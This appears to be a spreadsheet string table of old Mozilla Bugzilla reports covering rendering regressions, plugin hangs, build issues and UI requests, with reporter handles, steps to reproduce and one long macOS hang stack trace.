  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.7b) Gecko/20040309 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.7b) Gecko/20040309 Firefox/0.8.0+
CSS Background images are still shown even when Load Images is unchecked e.g.
the image added by the following CSS at the example URL is still shown when
images are turned off:
background: url(/image/default/sky.png) repeat-x
Reproducible: Always
Steps to Reproduce:
1. Disable Image Loading (e.g. In Firefox uncheck Tools-&gt;Options-&gt;Web
Features-&gt;Load Images).
2. Visit a site that uses background-images (e.g. http://www.mozillazine.org).
Actual Results:  
Background images are drawn (at the example URL the blimp + clouds are shown).
Expected Results:  
No images should be displayed.
Regression happened sometime between yesterday's (2004-03-08) official Firefox
nightly and when I built at approx. 1am PST today (2004-03-09).
Bug 57607 seems the likely cause (which is why I'm filing this one in the same
component).</t>
  </si>
  <si>
    <t>smrank</t>
  </si>
  <si>
    <t>FIREFOX-432112</t>
  </si>
  <si>
    <t>Cmd+? does not give Help (? in the shifted position)</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE
Press Cmd Shift + on a Mac with Swedish keyboard layout.
(the key has + in the unshifted position and ? is in the shifted position)
ACTUAL RESULT
The Help menu item flashes but nothing else happens.
EXPECTED RESULT
The Help menu item flashes and a new tab/window opens with Help contents.
PLATFORMS AND BUILDS TESTED
Bug occurs in Firefox 2008-05-02-09 on MacOSX 10.5.2
Regression window: 2008-04-07-04 -- 2008-04-08-04
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2008-04-07+03%3A00&amp;maxdate=2008-04-08+05%3A00&amp;cvsroot=%2Fcvsroot</t>
  </si>
  <si>
    <t>CORE-524919</t>
  </si>
  <si>
    <t>Qt build of Firefox or Fennec does not respect my screen's DPI</t>
  </si>
  <si>
    <t>Whenever I run the Qt port of Firefox on my desktop or the Qt port of Fennec on my mobile device my specified screen DPI is not respected.  It is a more visible problem on the mobile device since the DPI is several times larger than for my desktop.
An easy way to see the problem is to build the Qt port and run it in a surrogate X server.  I use Xephyr and with that I can specify my own DPI.</t>
  </si>
  <si>
    <t>bringbackbsd</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-290308</t>
  </si>
  <si>
    <t>Add expression to a few error messages</t>
  </si>
  <si>
    <t>Some of the error messages needs to have the expression generating the error
appended to them.</t>
  </si>
  <si>
    <t>CORE-301358</t>
  </si>
  <si>
    <t>HTTP refresh doesn't load page with bfcache enabled</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050719 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050719 Firefox/1.0+
pages using meta refresh dont seem to load the page and i have to reload the
page for it to come up
Reproducible: Always
Steps to Reproduce:
1) go to www.thedailypos.org/forum/
2) login with username: Name password: password
3) click the profile button
4) select Forum Profile Information
5) Click Change Info
Actual Results:  
Blank page comes up though reloading the page makes it come up
Expected Results:  
the pages loads</t>
  </si>
  <si>
    <t>shayne.anthony.jewers</t>
  </si>
  <si>
    <t>TESTOPIA-372542</t>
  </si>
  <si>
    <t>TESTOPIA</t>
  </si>
  <si>
    <t>In Reports of Testopia selecting Find Testcase Runs and deselecting product gives error.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1)
Build Identifier: Bugzilla version 2.22.1               I am useing Internet Explorer browser.
select reports under Testopia and select Find testcaseRuns. Deselect already selected product. error message popsup.
Reproducible: Always
Steps to Reproduce:
1.Select Reports under Testopia.
2.Select Find Testcase Runs.
3.Deselect already selected product.
4.Error message popsup.</t>
  </si>
  <si>
    <t>gregaryh</t>
  </si>
  <si>
    <t>alluri_shakuntala</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-105250</t>
  </si>
  <si>
    <t>ibm.com - EServer Catalog - doctype issues</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.5) Gecko/20011012
BuildID:    2001101201
Consider these too links:
docs1
docs2
In Mozilla only the second one works as expected. Both work in any other browser
I'd tested (Opera Netscape Links Lynx IE).
HTML validator parses this lines without errors.
Such lines can be found on IBM:
http://www-1.ibm.com/servers/eserver/ecatalog/ww/
There are hidden links for Mozilla.
Reproducible: Always
Steps to Reproduce:
1. add slash before &gt; in opening tag
2. e.g. docs1
Actual Results:  docs1 is not link
Expected Results:  docs1 is link</t>
  </si>
  <si>
    <t>bendik</t>
  </si>
  <si>
    <t>BUGZILLA-97114</t>
  </si>
  <si>
    <t>404 Error</t>
  </si>
  <si>
    <t>The above URL returns a 404 (document not found)</t>
  </si>
  <si>
    <t>barnboy</t>
  </si>
  <si>
    <t>robert.schmitt</t>
  </si>
  <si>
    <t>SEAMONKEY-148877</t>
  </si>
  <si>
    <t>add nss package config file and fix js package config file on the 1.0 branch</t>
  </si>
  <si>
    <t>There's no nss package config file built on the 1.0 branch and the js package
config file contains an error.  Easy fixes.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-36391</t>
  </si>
  <si>
    <t>Corrupt v file on lounge</t>
  </si>
  <si>
    <t>&gt; Check out this file
&gt;
&gt; /cvsroot/mozilla/widget/src/gtksuperwin/gdksuperwin.cv
&gt;
&gt; After the symbols the 1.7/1.6 version information is messed up
&gt;
&gt; [....]
&gt; 1.7
&gt; date    2000.01.11.21.11.23    author blizzard%redhat.com     state
&gt; Exp
&gt; branches
&gt; next    1.62   author blizzard%redhat.com     state Exp
&gt; branches
&gt; next    1.5
&gt;
&gt; 1.5
&gt; date    99.12.14.05.21.58      author blizzard%redhat.com     state
&gt; Exp
&gt; branches
&gt; next    1.4</t>
  </si>
  <si>
    <t>rkotalampi</t>
  </si>
  <si>
    <t>slamm</t>
  </si>
  <si>
    <t>NSS-39489</t>
  </si>
  <si>
    <t>Uninitialized memory read in CERT_DecodeDERCertificate()</t>
  </si>
  <si>
    <t>This is a replacement for Netscape bug
http://scopus/bugsplat/show_bug.cgi?id=113763
In HCL_1_51
[W] UMR: Uninitialized memory read in CERT_DecodeDERCertificate {1 occurrence}
    Reading 4 bytes from 0x0004fafc (4 bytes at 0x0004fafc uninitialized)
    Address 0x0004fafc points into a fiber's stack 
    Address 0x0004fafc is 28 bytes past the start of local variable 'entry' in 
certcallback
    Thread ID: 0xb8
    Error location
        CERT_DecodeDERCertificate [certdb.c:518]
        certcallback   [pcertdb.c:4356]
        SEC_TraverseDBEntries [pcertdb.c:4306]
        SEC_TraversePermCerts [pcertdb.c:4393]
        pk11_importKeyDB [pkcs11.c:3274]
        NSC_FindObjectsInit [pkcs11.c:3557]
        pk11_FindObjectByTemplate [pk11cert.c:100]
        PK11_MatchItem [pk11cert.c:160]
        PK11_FindPrivateKeyFromCert [pk11cert.c:1169]
        prot_ssl_init  [prot_ssl.c:217]
                        nickname)
                    goto done
                    }
             =&gt;     psk = PK11_FindPrivateKeyFromCert(ppk11si pcc NULL)
                    if (psk == NULL) {
                    nslog(NULL NSLOG_ERR Could not find private key\n)
                    goto done
        imap_main      [imapd.c:421]
------- Additional Comments From nelsonb  07/01/98 16:47 ------- 
Changed product version to 1.5</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-506266</t>
  </si>
  <si>
    <t>When a user searches for the exact title of a page that page should be the first result</t>
  </si>
  <si>
    <t>If I search MDC for xpcom thread synchronization
https://developer.mozilla.org/Special:Search?search=xpcom%20thread%20synchronization&amp;type=fulltext
which is the title of a article
https://developer.mozilla.org/En/XPCOM_Thread_Synchronization
that article doesn't show up in the first page of search results.  I consider this to be a major annoyance and hints at a bug in the search infrastructure.
bz CC'd on this bug has reported to me similar anecdotes.</t>
  </si>
  <si>
    <t>cjones.bugs</t>
  </si>
  <si>
    <t>CORE-374927</t>
  </si>
  <si>
    <t>useless horizontal scrollbar on ynet.co.il front page (with nested tables and table-layout: fixed)</t>
  </si>
  <si>
    <t>Created attachment 259326
testcase
Ynet's front page now has a horizontal scrollbar that lets you scroll a very long way to the right - although there's nothing to see there.
This regressed between 2007-02-18 and 2007-02-19. Perhaps by the patch for Bug 366865?
The attached testcase shows that this involves tables with table-layout: fixed nested inside an outer table (the testcase also displays the issues described in bug 364989). Note that minor changes to the testcase (such as adding borders on the tables) can cause the scrollbar to disappear - which is why I couldn't reduce it further.
This was first reported by Dror on the mozilla.co.il forums: http://www.mozilla.org.il/board/viewtopic.php?p=22660#22660</t>
  </si>
  <si>
    <t>uriber</t>
  </si>
  <si>
    <t>CORE-454844</t>
  </si>
  <si>
    <t>Drag and Drop</t>
  </si>
  <si>
    <t>-moz-drag-over is reversed</t>
  </si>
  <si>
    <t>Created attachment 338146
testcase
Since the new drag and drop apis the -moz-drag-over pseudo is reversed.
Actual: it applies only when something cannot be dropped.
Expected: it applies only when something can be dropped at that target.</t>
  </si>
  <si>
    <t>enndeakin</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-453334</t>
  </si>
  <si>
    <t>qm-pleopard-trunk01/03/04/08 need reboots.</t>
  </si>
  <si>
    <t>All unreachable.
I'm really starting to hate these leopard boxes.</t>
  </si>
  <si>
    <t>CORE-265745</t>
  </si>
  <si>
    <t>RelativizeURLInFragmentList forces InsertHTMLWithContext to clone its nsCOMArray</t>
  </si>
  <si>
    <t>RelativizeURIInFragmentList's first parameter is nsCOMArray nodeList
which means InsertHTMLWithContext has to clone its nodeList to pass it as a
parameter. Instead it only needs to be a (const) reference.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-101996</t>
  </si>
  <si>
    <t>Security: UI</t>
  </si>
  <si>
    <t>temp file with guessable name used during p12 import.</t>
  </si>
  <si>
    <t>See: 
http://www.securityfocus.com/bid/1201
Here's the place that Ian McGreer found where the temp file is created.
http://lxr.mozilla.org/mozilla/source/security/manager/ssl/src/nsPKCS12Blob.cpp#509</t>
  </si>
  <si>
    <t>ssaux</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-40330</t>
  </si>
  <si>
    <t>Java APIs to WebShell</t>
  </si>
  <si>
    <t>Many unimplemented API functions within Webclient</t>
  </si>
  <si>
    <t>There are many API functions within the Webclient Spec that have not yet been
implemented. There needs to be a way for Webclient to inform the API users that
the particular feature is as yet unimplemented.</t>
  </si>
  <si>
    <t>ashuk</t>
  </si>
  <si>
    <t>TOOLKIT-302164</t>
  </si>
  <si>
    <t>Password Manager</t>
  </si>
  <si>
    <t>Yes/No buttons in the Remember password dialog should describe their actions have accesskeys</t>
  </si>
  <si>
    <t>In the Remember password dialog we're using Yes/No buttons without making
their label a bit more informative suggesting Do Not Remember and Remember.</t>
  </si>
  <si>
    <t>PLUGINS_GRAVEYARD-506794</t>
  </si>
  <si>
    <t>Java (Java Embedding Plugin)</t>
  </si>
  <si>
    <t>PLUGINS_GRAVEYARD</t>
  </si>
  <si>
    <t>loading javafx.com hangs after a few page refresh</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10_5_7 en-us) AppleWebKit/530.19.2 (KHTML like Gecko) Version/4.0.2 Safari/530.19
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Refreshing javafx.com main page a few times cause firefox to hang
Reproducible: Always
Steps to Reproduce:
1.   Open a few tabs and load some content cnn.com wired.com etc
2.   open a new tab to javafx.com this will trigger loading of javafx applet
3.   click yes on any security dialog pop up
4.   refresh a few times browser will hang
this only happens with the MRJ plugin on MacOS windows works fine.
Also if switch to new plugin on MacOS bug cannot be reproduced.
Expected Results:  
browser/plugin should not hang
Date/Time:      2009-07-27 16:41:28 -0700
OS Version:     10.5.7 (Build 9J61)
Architecture:   i386
Report Version: 4
Command:        Firefox
Path:           /Applications/Firefox.app/Contents/MacOS/firefox-bin
Version:        3.5.1 (3.5.1)
Parent:         launchd [117]
PID:            4259
Event:          hang
Time:           9.39s
Steps:          47
Process:        firefox-bin [4259]
Path:           /Applications/Firefox.app/Contents/MacOS/firefox-bin
  ADDRESS         BINARY
  00001000        /Applications/Firefox.app/Contents/MacOS/firefox-bin
  00006000        /Applications/Firefox.app/Contents/MacOS/libxpcom.dylib
  0000b000        /Applications/Firefox.app/Contents/MacOS/libplds4.dylib
  00014000        /Applications/Firefox.app/Contents/MacOS/libplc4.dylib
  00035000        /Applications/Firefox.app/Contents/MacOS/libnspr4.dylib
  00071000        /Applications/Firefox.app/Contents/MacOS/libsmime3.dylib
  0008f000        /Applications/Firefox.app/Contents/MacOS/libssl3.dylib
  000de000        /Applications/Firefox.app/Contents/MacOS/libmozjs.dylib
  001bc000        /Applications/Firefox.app/Contents/MacOS/libsqlite3.dylib
  0022d000        /Applications/Firefox.app/Contents/MacOS/libnss3.dylib
  002f9000        /Applications/Firefox.app/Contents/MacOS/libnssutil3.dylib
  0030f000        /Applications/Firefox.app/Contents/MacOS/libsoftokn3.dylib
  00379000        /Applications/Firefox.app/Contents/MacOS/components/libbrowserdirprovider.dylib
  0063c000        /Applications/Firefox.app/Contents/MacOS/components/libalerts_s.dylib
  00693000        /Applications/Firefox.app/Contents/MacOS/components/libbrowsercomps.dylib
  006fa000        /System/Library/CoreServices/Encodings/libSimplifiedChineseConverter.dylib
  00b38000        /System/Library/TextEncodings/Unicode Encodings.bundle/Contents/MacOS/Unicode Encodings
  00e8d000        /Applications/Firefox.app/Contents/MacOS/XUL
  15145000        /System/Library/CoreServices/Encodings/libTraditionalChineseConverter.dylib
  152a4000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libfontmanager.jnilib
  154c9000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libdeploy.jnilib
  154d8000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/liblaf.jnilib
  15c66000        /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLRendererFloat.bundle/GLRendererFloat
  1687d000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln4690762644789988447/libdecora-sse.jnilib
  16df6000        /System/Library/Frameworks/OpenGL.framework/Resources/GLEngine.bundle/GLEngine
  16fa9000        /System/Library/Extensions/GeForce8xxxGLDriver.bundle/Contents/MacOS/GeForce8xxxGLDriver
  177ce000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln8885381185793581241/libjogl.jnilib
  17fa9000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libnet.jnilib
  17fbb000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libnio.jnilib
  18222000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln8885381185793581241/libKeyChainLibrary.jnilib
  1845f000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln8885381185793581241/libdecora-sse.jnilib
  1a0ab000        /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/ATSHI.dylib
  1a2d4000        /Applications/Firefox.app/Contents/MacOS/libnssdbm3.dylib
  1a880000        /Applications/Firefox.app/Contents/MacOS/libfreebl3.dylib
  1a8f0000        /Applications/Firefox.app/Contents/MacOS/libnssckbi.dylib
  1ab58000        /System/Library/CoreServices/RawCamera.bundle/Contents/MacOS/RawCamera
  1b5e0000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln6066953498965218818/libjogl.jnilib
  1b8fe000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln2064063422567600152/libdecora-sse.jnilib
  1bf2f000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln4690762644789988447/libjogl.jnilib
  1c5e5000        /System/Library/Frameworks/JavaVM.framework/Versions/A/JavaVM
  1c827000        /Library/Internet Plug-Ins/QuickTime Plugin.plugin/Contents/MacOS/QuickTime Plugin
  1c88d000        /System/Library/Frameworks/JavaVM.framework/Versions/A/Frameworks/JavaNativeFoundation.framework/Versions/A/JavaNativeFoundation
  1c8d8000        /Applications/Firefox.app/Contents/MacOS/plugins/MRJPlugin.plugin/Contents/MacOS/MRJPlugin
  1c912000        /Applications/Firefox.app/Contents/MacOS/plugins/JavaEmbeddingPlugin.bundle/Contents/MacOS/JavaEmbeddingPlugin
  1c955000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5/Libraries/libawt.jnilib
  1cb8c000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libjava.jnilib
  1cbb5000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libverify.dylib
  1cbc2000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libclient.dylib
  1cf84000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libzip.jnilib
  2b78a000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5/Resources/JavaPluginCocoa.bundle/Contents/MacOS/JavaPluginCocoa
  2bdfc000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libcmm.jnilib
  2be09000        /System/Library/Frameworks/CoreAudioKit.framework/Versions/A/CoreAudioKit
  2be8b000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libsuncmm.jnilib
  2bf1c000        /System/Library/Frameworks/JavaVM.framework/Versions/1.5.0/Libraries/libjpeg.jnilib
  2c842000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln6066953498965218818/libdecora-sse.jnilib
  2c992000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln632088687392941878/libjogl.jnilib
  2ca74000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln632088687392941878/libdecora-sse.jnilib
  2de45000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln2064063422567600152/libjogl.jnilib
  2ee10000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln464050520297428450/libdecora-sse.jnilib
  309e0000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln1245102932079094231/libdecora-sse.jnilib
  30cc0000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln1245102932079094231/libjogl.jnilib
  313f3000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln464050520297428450/libjogl.jnilib
  33bd3000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln2674010676198759141/libdecora-sse.jnilib
  33de0000        /private/var/folders/Sd/SdwfRQXzH5mb9luQVz41Wk+++TI/-Tmp-/jnlp-applet/jln5581544334128741232/jln2674010676198759141/libjogl.jnilib
  36900000        /Library/Internet Plug-Ins/Flash Player.plugin/Contents/MacOS/Flash Player
  ba900000        /System/Library/CoreServices/Encodings/libJapaneseConverter.dylib
  bab00000        /System/Library/CoreServices/Encodings/libKoreanConverter.dylib
  Thread id:      89178b8
  User stack:
    46 start + 41 (in firefox-bin) [0x2469]
      46 start + 258 (in firefox-bin) [0x2542]
        46 start + 2168 (in firefox-bin) [0x2cb8]
          46 _XRE_main + 9880 (in XUL) [0xe95308]
            46 __ZSt13__adjust_heapIN9__gnu_cxx17__normal_iteratorIP8nsRefPtrI13imgCacheEntryESt6vectorIS4_SaIS4_EEEEiS4_PFbRKS4_SB_EEvT_T0_SF_T1_T2_ + 6497543 (in XUL) [0x1683f77]
              46 _JSD_GetValueForObject + 826154 (in XUL) [0x17e8d8a]
                46 -[NSApplication run] + 795 (in AppKit) [0x949585fb]
                  46 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128 (in AppKit) [0x9495f5c0]
                    46 __DPSNextEvent + 657 (in AppKit) [0x9495fd0d]
                      46 _BlockUntilNextEventMatchingListInMode + 106 (in HIToolbox) [0x97071f19]
                        46 _ReceiveNextEventCommon + 374 (in HIToolbox) [0x970720a5]
                          46 _RunCurrentEventLoopInMode + 283 (in HIToolbox) [0x9707228c]
                            46 _CFRunLoopRunInMode + 88 (in CoreFoundation) [0x941a9c78]
                              46 _CFRunLoopRunSpecific + 844 (in CoreFoundation) [0x941a8c9c]
                                46 ___CFRunLoopDoObservers + 466 (in CoreFoundation) [0x941a7942]
                                  46 __handleWindowNeedsDisplay + 436 (in AppKit) [0x94961e84]
                                    46 -[NSWindow displayIfNeeded] + 189 (in AppKit) [0x94962061]
                                      46 -[NSView displayIfNeeded] + 933 (in AppKit) [0x949624b3]
                                        46 -[NSView _displayRectIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:] + 3090 (in AppKit) [0x94a21adf]
                                          46 -[NSThemeFrame _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] + 306 (in AppKit) [0x94a24fbb]
                                            46 -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] + 4433 (in AppKit) [0x94a264d3]
                                              46 -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] + 4433 (in AppKit) [0x94a264d3]
                                                46 _Java_sun_awt_image_GifImageDecoder_parseImage_redirect + 17756 (in JavaEmbeddingPlugin) [0x1c91ae46]
                                                  46 -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] + 759 (in AppKit) [0x94a25679]
                                                    46 -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:] + 1969 (in AppKit) [0x94a270ba]
                                                      46 -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:] + 1050 (in AppKit) [0x94a26d23]
                                                        46 _Java_sun_awt_image_GifImageDecoder_parseImage_redirect + 47811 (in JavaEmbeddingPlugin) [0x1c9223ad]
                                                          46 -[NSView _drawRect:clip:] + 3853 (in AppKit) [0x94a2822c]
                                                            46 _PoseAsNSTextFieldFocusView + 451 (in JavaEmbeddingPlugin) [0x1c93bcce]
                                                              46 _PoseAsNSCarbonWindowFrame + 952 (in JavaEmbeddingPlugin) [0x1c936258]
                                                                46 -[NSViewAWT drawRect:] + 69 (in libawt.jnilib) [0x1c960aa1]
                                                                  46 -[AWTDrawableContextManager drawRect:withDrawable:] + 349 (in libawt.jnilib) [0x1c960c04]
                                                                    46 _JNFCallVoidMethod + 84 (in JavaNativeFoundation) [0x1c89005c]
                                                                      46 _JNI_CreateJavaVM_Impl + 106843 (in libclient.dylib) [0x1cdd2deb]
                                                                        46 ??? [0x1cc6536c]
                                                                          46 ??? [0x1ccdb036]
                                                                            46 ??? [0x1ccdb31a]
                                                                              46 ??? [0x1f68b227]
                                                                                46 ??? [0x1f68d9d3]
                                                                                  46 ??? [0x1f68d9d3]
                                                                                    46 ??? [0x1f6ffdc0]
                                                                                      46 ??? [0x1f9b2d4c]
                                                                                        46 ??? [0x1fa03444]
                                                                                          46 ??? [0x1f9b37bc]
                                                                                            46 ??? [0x1f94efbc]
                                                                                              46 ??? [0x1f879080]
                                                                                                46 ??? [0x1fa32a4c]
                                                                                                  46 ??? [0x1f8ca434]
                                                                                                    46 ??? [0x1f8ca4de]
                                                                                                      46 ??? [0x1f701a72]
                                                                                                        46 ??? [0x1ccf0373]
                                                                                                          46 ??? [0x1cc77af4]
                                                                                                            46 _mach_msg_trap + 10 (in libSystem.B.dylib) [0x903f3286]</t>
  </si>
  <si>
    <t>smichaud</t>
  </si>
  <si>
    <t>thomas.v.ng</t>
  </si>
  <si>
    <t>CORE-329509</t>
  </si>
  <si>
    <t>Do not prevent event dispatching via dispatchEvent even if there is no prescontext or (form) element is disabled</t>
  </si>
  <si>
    <t>Do not prevent event dispatching even if there is no prescontext or (form) element is disabled. Currently for example mutation events don't work if form elements are
disabled.</t>
  </si>
  <si>
    <t>mcaceres</t>
  </si>
  <si>
    <t>CORE-156988</t>
  </si>
  <si>
    <t>Move appstrings.properties into mozilla/docshell/resources/locale/en-US</t>
  </si>
  <si>
    <t>Docshell's appstrings.properties should be moved into the resources directory
now that we have one.
Note to self remember to change
mozilla/build/mac/build_scripts/MozillaBuildList.pm.</t>
  </si>
  <si>
    <t>adamlock</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-173209</t>
  </si>
  <si>
    <t>gsc-game.com - warning for Mozilla and Netscape browser</t>
  </si>
  <si>
    <t>Users of Mozilla/Netscape browsers are warned before entering site:
Warning! Netscape and Opera browser is not entirely supported.
You need Internet Explorer 4.5 and up
and Javascript enabled to view this web page.
But site looks good in actual nightbuild.</t>
  </si>
  <si>
    <t>aha</t>
  </si>
  <si>
    <t>CORE-524402</t>
  </si>
  <si>
    <t>Menu behind Flash Page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 8.0 Windows NT 6.0 Trident/4.0 WPS GTB6 SLCC1 .NET CLR 2.0.50727 Media Center PC 5.0 eSobiSubscriber 2.0.4.16 .NET CLR 3.5.30729 .NET CLR 3.0.30618)
Build Identifier: Mozilla/5.0 WinCE6.0 rv1.9.2a2 Gecko/20090920 Firefox/3.6a2
1.Go to Hotmail Click Options on right-top of screen (pic1)
2.The option menu is coverd by FlashPage
Other info:
IE doesn't have this problem
Reproducible: Always
Steps to Reproduce:
1.Go to Hotmail Click Options on right-top of screen (pic1)
2.The option menu is coverd by FlashPage
Other info:
IE doesn't have this problem</t>
  </si>
  <si>
    <t>starking</t>
  </si>
  <si>
    <t>THUNDERBIRD-226759</t>
  </si>
  <si>
    <t>need to package files from toolkit/components/printing (/skin)</t>
  </si>
  <si>
    <t>due to the unforking of the print dialogs by pch on 10/25/2003 we are not
packaging some necessary files for Thunderbird (especially the skin files maybe
more).
One visible effect is that the Page Setup dialog uses classic and not Qute icons
for portrait/landscape orientation.</t>
  </si>
  <si>
    <t>CORE-112098</t>
  </si>
  <si>
    <t>Font download dialog too small and lacks a title.</t>
  </si>
  <si>
    <t>Build ID: 2001 11 26 03. Windows 2000.
The dialog window To display language characters correctly you need to...
is so small that it's easily mistaken for some pesky
spyware-ad-click-tracker-whatever-javascript-evil-stuff.
Also the window lacks a title.</t>
  </si>
  <si>
    <t>kleist</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-482489</t>
  </si>
  <si>
    <t>Feedback/Alert notifications need identity/connection information</t>
  </si>
  <si>
    <t>At the moment the feedback/alert notifications only have the information that is in the error message e.g. Failed to connect to server xxx.
We should try and provide identity/connection/account information to allow some grouping/more information about where the feedback originated from.</t>
  </si>
  <si>
    <t>CORE-344615</t>
  </si>
  <si>
    <t xml:space="preserve">Implement </t>
  </si>
  <si>
    <t>I'm willing to take a shot at implementing  as described in Web Forms 2.0.</t>
  </si>
  <si>
    <t>mounir</t>
  </si>
  <si>
    <t>ajvincent</t>
  </si>
  <si>
    <t>WEBSITES-519124</t>
  </si>
  <si>
    <t>Mozilla Community Sites</t>
  </si>
  <si>
    <t>Create WordPress plugin which will get actual download links for Mozilla applications</t>
  </si>
  <si>
    <t>One operation which do local communities on local websites with every release of Firefox or Thunderbird is update download links to newer version. 
It would be good to create script/plugin for WordPress which would check regurarly some source (RSS XML file...) and detect if new version of Firefox or Thunderbird is available.
Goal is to have way how to have links to actual versions of Mozilla applications automatically on local community websites.
At this moment we have (Mozilla.sk and Mozilla.cz) plugin for WordPress for managing downloads but we must do all manually.</t>
  </si>
  <si>
    <t>mstanke</t>
  </si>
  <si>
    <t>CORE-364318</t>
  </si>
  <si>
    <t>[FIX]shrinkwithoutcells should verify cells before deleting them</t>
  </si>
  <si>
    <t>this is a regression from bug 356335</t>
  </si>
  <si>
    <t>THUNDERBIRD-506660</t>
  </si>
  <si>
    <t>Need vista specific icons for Activity Manager</t>
  </si>
  <si>
    <t>Currently TB under Vista makes use of the same icons and XP. We should use Aero styled icons here instead.</t>
  </si>
  <si>
    <t>CORE-307492</t>
  </si>
  <si>
    <t>64-bit unsafe cast in TestIOThreads.cpp</t>
  </si>
  <si>
    <t>There is a 64-bit unsafe cast from void* -&gt; int in TestIOThreads.cpp causing my
build to fail on x86_64 gcc 4.0.1</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-846331</t>
  </si>
  <si>
    <t>Gaia</t>
  </si>
  <si>
    <t>Remove UA override for yelp.com</t>
  </si>
  <si>
    <t>Created attachment 719492
Patch to remove the yelp.com UA override
In bug 798694 we added an UA override for yelp.com. Yelp now recognizes the B2G UA as mobile. The override can be removed</t>
  </si>
  <si>
    <t>FIREFOX-458299</t>
  </si>
  <si>
